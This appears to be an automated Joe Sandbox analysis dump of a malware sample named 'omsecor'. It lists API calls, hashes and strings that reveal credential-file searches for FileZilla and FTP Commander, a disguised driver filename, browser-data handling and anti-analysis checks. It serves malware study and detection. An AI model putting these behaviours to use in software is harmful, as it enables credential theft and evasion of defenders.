                          • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                          • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                          • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                          • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                          • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409FCE
                          • GetTickCount.KERNEL32 ref: 00409FDE
                          • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                          • DispatchMessageW.USER32(?), ref: 0040A009
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                          • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409F5B
                          • GetTickCount.KERNEL32 ref: 00409F5F
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                          • DispatchMessageW.USER32(?), ref: 00409F80
                          • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                          • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
                          • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                          • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                          • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                          • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                          • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                          • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                          • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004097ED
                          • SysAllocString.OLEAUT32(?), ref: 004097FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "domain"$"url"
                          • API String ID: 2525500382-2438671658
                          • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                          • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                          • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                          • CharLowerW.USER32(00408795), ref: 004095D8
                          • SysFreeString.OLEAUT32(00408795), ref: 00409608
                          • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharFreeLowerString
                          • String ID:
                          • API String ID: 2335467167-0
                          • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                          • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 90 4012c0-4012e8 FindFirstFileA call 401080
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,6D368A53), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 17 407a98-407a9f GetModuleHandleA 18 407aa1-407ab0 call 407ab5 17->18 19 407adf 17->19 29 407ab2-407abd GetProcAddress 18->29 30 407b17 18->30 20 407ae1-407ae5 19->20 22 407b24 call 407b29 20->22 23 407ae7-407aef GetModuleHandleA 20->23 26 407af1-407af9 23->26 26->26 28 407afb-407afe 26->28 28->20 31 407b00-407b02 28->31 29->19 33 407abf-407acc VirtualProtect 29->33 32 407b18-407b20 30->32 36 407b04-407b06 31->36 37 407b08-407b10 31->37 41 407b22 32->41 34 407ade 33->34 35 407ace-407adc VirtualProtect 33->35 34->19 35->34 39 407b11-407b12 GetProcAddress 36->39 37->39 39->30 41->28
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 42 407a59-407a6e 43 407a70-407a78 42->43 44 407adf 42->44 43->44 46 407a7a-407aa8 call 407a98 43->46 45 407ae1-407ae5 44->45 47 407b24 call 407b29 45->47 48 407ae7-407aef GetModuleHandleA 45->48 54 407aaa 46->54 55 407b1e-407b20 46->55 51 407af1-407af9 48->51 51->51 53 407afb-407afe 51->53 53->45 56 407b00-407b02 53->56 57 407aac-407ab0 54->57 58 407b0d-407b10 54->58 59 407b22 55->59 60 407b18-407b1d 55->60 61 407b04-407b06 56->61 62 407b08-407b0c 56->62 65 407b17 57->65 66 407ab2-407abd GetProcAddress 57->66 63 407b11-407b12 GetProcAddress 58->63 59->53 60->55 61->63 62->58 63->65 65->60 66->44 67 407abf-407acc VirtualProtect 66->67 68 407ade 67->68 69 407ace-407adc VirtualProtect 67->69 68->44 69->68
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph

                          • Executed
                          • Not Executed
